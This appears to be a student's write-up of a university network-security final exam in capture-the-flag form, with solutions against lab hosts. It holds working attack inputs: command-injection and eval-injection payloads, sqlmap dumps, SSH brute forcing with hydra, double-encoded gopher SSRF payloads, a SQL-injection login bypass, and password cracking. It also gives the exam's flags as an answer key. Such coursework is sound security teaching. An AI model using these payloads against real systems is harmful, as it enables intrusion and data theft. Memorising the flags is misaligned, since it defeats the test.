112-1 NTUT網路與系統安全期末考試

--- title: '112-1 NTUT網路與系統安全期末考試' disqus: hackmd --- 112-1 NTUT網路與系統安全期末考試 === # Table of Contents [TOC] # Final Exam ## Command Injection ![image](https://hackmd.io/_uploads/r1Zbr_jup.png) http://192.168.240.109:10039/ ![image](https://hackmd.io/_uploads/rkL4BOo_p.png) ### Command Injection Solution Source Code ```php= <?php if (isset($_GET['file'])) { $file = $_GET['file']; system("tar cvf /tmp/$file $file"); echo "Your file /$file"; } else { highlight_file(__FILE__); } ``` > 根據Source Code 給出file query > http://192.168.240.109:10039/?file ![image](https://hackmd.io/_uploads/Sy5gv_o_p.png) > http://192.168.240.109:10039/?file=%22;whoami ![image](https://hackmd.io/_uploads/Bkjqv_o_6.png) > http://192.168.240.109:10039/?file=";/readflag ![image](https://hackmd.io/_uploads/rJPaDujOp.png) ### Get FLAG **FlAG: flag{7a04951d-a174-4588-91fc-4ff1d05aebb2}** ## sqlmap ![image](https://hackmd.io/_uploads/BJPbK_oda.png) 192.168.240.109:10018 ![image](https://hackmd.io/_uploads/Hyy_mKiup.png) ### sqlmap Solution > vaala/vaala ![image](https://hackmd.io/_uploads/HyXbEFjup.png) > http://192.168.240.109:10018/index.php?username=vaala&password=vaala ### sqlmap > sqlmap -u "http://192.168.240.109:10018/index.php?username=vaala&password=vaala" --flush-session --random-agent --level 5 --batch --dbs ![image](https://hackmd.io/_uploads/BJipNFjOp.png) > sqlmap -u "192.168.240.109:10018/index.php?username=vaala&password=vaala" --batch --dbs -D vaalacat --tables ![image](https://hackmd.io/_uploads/HJj4Dto_p.png) > sqlmap -u "192.168.240.109:10018/index.php?username=vaala&password=vaala" --batch --dbs -D vaalacat -T vaala --dump ![image](https://hackmd.io/_uploads/HJGUDFs_6.png) LOGIN ![image](https://hackmd.io/_uploads/H1YRwKo_T.png) ### Get FLAG **FlAG: jkladsfhjklfghjkfdghjk** ## pdfcrack ![image](https://hackmd.io/_uploads/Sy9UYFsOa.png) http://192.168.240.109:10090/ ### pdfcrack Solution > sudo apt install pdfcrack ![image](https://hackmd.io/_uploads/r1Uwoci_T.png) > pdfcrack encryption_pdf.pdf ![image](https://hackmd.io/_uploads/B1usi9o_6.png) ![image](https://hackmd.io/_uploads/HyWJhCs_p.png) ### Get FLAG **FlAG: flag{ffa1c235-f3f2-426c-8b12-5b8f809b8244}** ## hashcat ![image](https://hackmd.io/_uploads/S1DS2Ksda.png) 192.168.240.109:10018 ![image](https://hackmd.io/_uploads/SyfwnFsO6.png) ### hashcat Solution > sudo zip2john encryption_zip.zip > zip.hash ![image](https://hackmd.io/_uploads/BymA2FsuT.png) ``` encryption_zip.zip/flag:$pkzip2$1*2*2*0*37*2b*2033c5dc*0*3e*0*37*2033*19e9*d93e69e20b95b92b648704d2f71a2d1992e778ddb82ea147026ae713b0e5dd6fbbd34761f666c902ac5d3da68d72c7bbd5b5a619bcefb8*$/pkzip2$:flag:encryption_zip.zip::encryption_zip.zip ``` > sudo john zip.hash ![image](https://hackmd.io/_uploads/BJ9qaRsua.png) password: 635438 ![image](https://hackmd.io/_uploads/BkL6pRi_6.png) ### Get FLAG **FlAG: flag{d898a3e4-00be-40d8-b56a-6b38e50f9000}** ## eval ![image](https://hackmd.io/_uploads/HyAor9oua.png)\ 192.168.240.109:10058 > nc 192.168.240.109 10058 ![image](https://hackmd.io/_uploads/Bkggm3ida.png) ### eval Solution > hint ![image](https://hackmd.io/_uploads/r15rB3oup.png) > eval(os.system('whoami')) ![image](https://hackmd.io/_uploads/SyMHY0sdT.png) **代表Source Code 沒有import os 的module** >eval("__ import__('os').system('whoami')") ![image](https://hackmd.io/_uploads/B1bfFCo_6.png) [● eval to import a module](https://stackoverflow.com/questions/17136772/eval-to-import-a-module) > eval("__ import__('os').system('cat /f*')") ![image](https://hackmd.io/_uploads/S1F3cCodT.png) ### Get FLAG **FlAG: flag{d77ea135-bca7-4ff9-be12-fbad9dd4ec8d}** ## zaproxy ![image](https://hackmd.io/_uploads/B1JRw9i_a.png) 192.168.240.109:10002 ### zaproxy Solution ![image](https://hackmd.io/_uploads/HJ_M_5oua.png) ![image](https://hackmd.io/_uploads/SywvucjOT.png) ### Get FLAG **FlAG: jquery-3.3.1.slim.min.js** ## nmap ![image](https://hackmd.io/_uploads/S1Pt1ns_6.png) http://192.168.240.145/ ![image](https://hackmd.io/_uploads/rks-g3iua.png) ### nmap Solution >nmap -sC -sV -T4 192.168.240.145 ![image](https://hackmd.io/_uploads/HJuVZnsOT.png) ### Get FLAG **FlAG: MySQL 5.0.51a-3ubuntu5** ## ssh-cracker ![image](https://hackmd.io/_uploads/S1aj3Y0da.png) ssh://192.168.240.115 ![image](https://hackmd.io/_uploads/HyzlzJ2d6.png) ### ssh-cracker Solution > hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.240.115 ![image](https://hackmd.io/_uploads/S12xN12_a.png) passowrd:11111111 > ssh admin@192.168.20.1 ![image](https://hackmd.io/_uploads/rkNqN13O6.png) > sudo scp admin@192.168.240.115:/home/admin/ffflag/FileOne.bin / ![image](https://hackmd.io/_uploads/S1KTB13up.png) > binwalk FileOne.bin ![image](https://hackmd.io/_uploads/B1tBUkhdp.png) ### Get FLAG **FlAG: 0x7FE9E826** ## ssrf ![image](https://hackmd.io/_uploads/r1afK5sup.png) 192.168.240.109:10024 ![image](https://hackmd.io/_uploads/SJsEKqjOp.png) Source Code ```php= <?php if(isset($_GET['url'])) { $url = $_GET['url']; if(filter_var($url, FILTER_VALIDATE_URL)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); curl_close($ch); echo $result; } else { die("What are you doing?"); } } else { highlight_file(__FILE__); } ``` ### ssrf Solution http://192.168.240.109:10024/?url=/readflag ![image](https://hackmd.io/_uploads/SyKO0qo_6.png) curl -v 192.168.240.109:10081/?url=gopher://127.0.0.1:8000/ ![image](https://hackmd.io/_uploads/rJXtFxhOT.png) 200 /_GET /readflag HTTP/1.1 Host: 127.0.0.1 Content-Length: 14 Content-Type: application/x-www-form-urlencoded Connection: close http://192.168.240.109:10081/?url=gopher://127.0.0.1:8000%2F_GET%2520%2Freadflag%2520HTTP%2F1.1%250d%250aHost%3A%2520127.0.0.1%250d%250aContent-Length%3A%252014%250d%250aContent-Type%3A%2520application%2Fx-www-form-urlencoded%250d%250aConnection%3A%2520close%250d%250a%250d%250a ![image](https://hackmd.io/_uploads/ByPc6-nu6.png) > 代表目錄錯誤 https://zhuanlan.zhihu.com/p/112055947 /_POST HTTP/1.1 Host: 127.0.0.1 Content-Length: 15 Content-Type: application/x-www-form-urlencoded Connection: close cmd=/readflag URL encode 1次: http://192.168.240.109:10028/?url=gopher://127.0.0.1:8000/_POST%20/%20HTTP/1.1%0D%0AHost:127.0.0.1%0D%0AContent-Length:%2014%0D%0AContent-Type:%20application%2Fx-www-form-urlencoded%20Connection:%20close%0D%0A%0D%0Acmd=/readflag%0D%0A Double encode (HTTP 400): http://192.168.240.109:10066/?url=gopher://127.0.0.1:8000/_POST%2520/%2520HTTP/1.1%250D%250AHost:127.0.0.1%250D%250AContent-Length:%252014%250D%250AContent-Type:%2520application%2Fx-www-form-urlencoded%2520Connection:%2520close%250D%250A%250D%250Acmd=/readflag%250D%250A > Double encode > 空白encode兩次、\r\n也encode兩次 > 其他不用encode > > **Content lengh 不對** ![image](https://hackmd.io/_uploads/S1zj4uTOa.png) 確認Content lengh長度 http://192.168.240.109:10066/?url=gopher://127.0.0.1:8000/_POST%2520/%2520HTTP/1.1%250D%250AHost:127.0.0.1%250D%250AContent-Length:%252013%250D%250AContent-Type:%2520application%2Fx-www-form-urlencoded%2520Connection:%2520close%250D%250A%250D%250Acmd=/readflag%250D%250A ![image](https://hackmd.io/_uploads/S1Eyr_aOT.png) ### Get FLAG **FlAG: flag{e26ab8e5-24d1-4634-ae00-3dc982afde0c}** ## sqli union ![image](https://hackmd.io/_uploads/HyQuSzh_p.png) http://192.168.240.109:10006/ ![image](https://hackmd.io/_uploads/ByxFnHM3da.png) ### sqli union Solution Source Code ```Node.js= const express = require('express'); const sqlite3 = require('sqlite3'); const { open } = require('sqlite'); const crypto = require('crypto'); const bodyParser = require('body-parser'); const fs = require('fs'); const app = express(); const PORT = process.env.PORT || 80; app.use(bodyParser.urlencoded({ extended: true })); let db; const filePath = '/flag'; let flag; fs.readFile(filePath, 'utf8', (err, data) => { if (err) { console.error('Error reading file:', err); return; } // Store the value in the 'flag' variable flag = data; console.log('Flag:', flag); }); async function getDB() { if (!db) { db = await open({ filename: '/tmp/database.db', driver: sqlite3.Database }); await db.exec(` CREATE TABLE IF NOT EXISTS admin ( username TEXT NOT NULL, password TEXT NOT NULL ) `); const countResult = await db.get('SELECT COUNT(*) as count FROM admin WHERE username="admin"'); const count = countResult.count; if (count === 0) { const token = crypto.randomBytes(32).toString('hex'); await db.run('INSERT INTO admin (username, password) VALUES (?, ?)', ['admin', token]); } } return db; } process.on('uncaughtException', (err) => { console.error('Uncaught Exception:', err); // You can add additional error handling logic here }) app.use(async (req, res, next) => { req.db = await getDB(); next(); }); app.get('/', (req, res) => { res.render('index.ejs', { failed: req.query.failed !== undefined }); }); app.post('/login', async (req, res) => { const username = req.body.username; const password = req.body.password; if (!username || !password) { return res.redirect('/?failed'); } try{ const row = await req.db.get(`SELECT * FROM admin WHERE username='${username}'`); if (row && row.username === 'admin' && row.password === password) { return res.send('FLAG: ' + flag); } } catch(error) { console.log(error); } return res.redirect('/?failed'); }); app.get('/source', async (req, res) => { const fs = require('fs'); // const re = /FLAG{.*}/; let sourceCode = fs.readFileSync(__filename, 'utf8'); // sourceCode = sourceCode.replace(re, 'FLAG{not_real_flag}'); res.set('Content-Type', 'text/plain'); res.send(sourceCode); }); app.listen(PORT, () => { console.log(`Server is running on port ${PORT}`); }); ``` xxxxx' ) union SELECT 'admin','`chw`' -- `chw` (X) ' UNION SELECT 1, username, password FROM admin -- (X) admin' UNION SELECT null, password FROM admin-- (X) admin' UNION ALL SELECT null, password FROM admin-- (X) > chw' UNION SELECT 'admin','pwd' FROM admin where username='admin\ > pwd ![image](https://hackmd.io/_uploads/B1Vk9YC_T.png) ### Get FLAG **FlAG: flag{4f5c7927-a36b-4cb0-b64e-65977559eae6}**